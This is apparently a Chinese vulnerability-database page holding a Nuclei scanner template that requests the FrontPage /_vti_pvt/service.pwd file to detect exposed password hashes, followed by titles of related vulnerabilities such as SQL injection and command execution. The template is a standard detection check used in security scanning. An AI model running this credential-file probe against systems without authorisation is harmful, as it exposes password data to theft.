service-pwd: service.pwd - Sensitive Information Disclosure

漏洞描述

PoC代码[已公开]

id: service-pwd

info:
  name: service.pwd - Sensitive Information Disclosure
  author: pussycat0x
  severity: high
  description: service.pwd was discovered, which is likely to contain sensitive information.
  reference:
    - https://www.exploit-db.com/ghdb/7256
  metadata:
    max-request: 1
  tags: exposure,listing,service,edb,misconfig,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/_vti_pvt/service.pwd"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "# -FrontPage-"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a004730450220726f938ec71c345d3f3db43700d6a08db900faa7b680eaf4b8260553da5b8106022100f0c87dc2f21a73669d6e648aebe1d1f40c86e3ebe379ccfc8aff11e826859431:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• 天锐绿盘云文档安全管理平台 /lddsm/service/../admin/config/findConfigForPage.do SQL 注入漏洞
• 天锐绿盘云文档安全管理平台 /lddsm/service/../admin/bfclConfig/findForPage.do SQL 注入漏洞
• N-central /dms/services/ServerMMS XML 外部实体注入漏洞（CVE-2025-11700）
• POC CVE-2018-13317: TOTOLINK A3002RU 1.0.8 - Information Disclosure
• POC CVE-2019-19822: TOTOLINK/Realtek Routers - Information Disclosure
• POC CVE-2019-19823: TOTOLINK/Realtek Routers - Information Disclosure
• POC CVE-2024-8852: All-in-One WP Migration < 7.87 - Unauthenticated Information Disclosure
• 用友U8 Cloud /service/FileManageServlet 文件读取漏洞
• POC CVE-2025-9985: Featured Image from URL (FIFU) <= 5.2.7 - Unauthenticated Information Exposure via Log File
• POC generic-php-files: Generic PHP Backup Information Disclosure
• HJSoft HCM Human Resources Management System /selfservice/lawresource/downlawbase SQL 注入漏洞（CVE-2025-10197）
• POC 爱数 AnyShare智能内容管理平台 /api/ServiceAgent/stop_service 命令执行漏洞
• 亿赛通电子文档安全管理系统 HookWhiteListservice SQL注入漏洞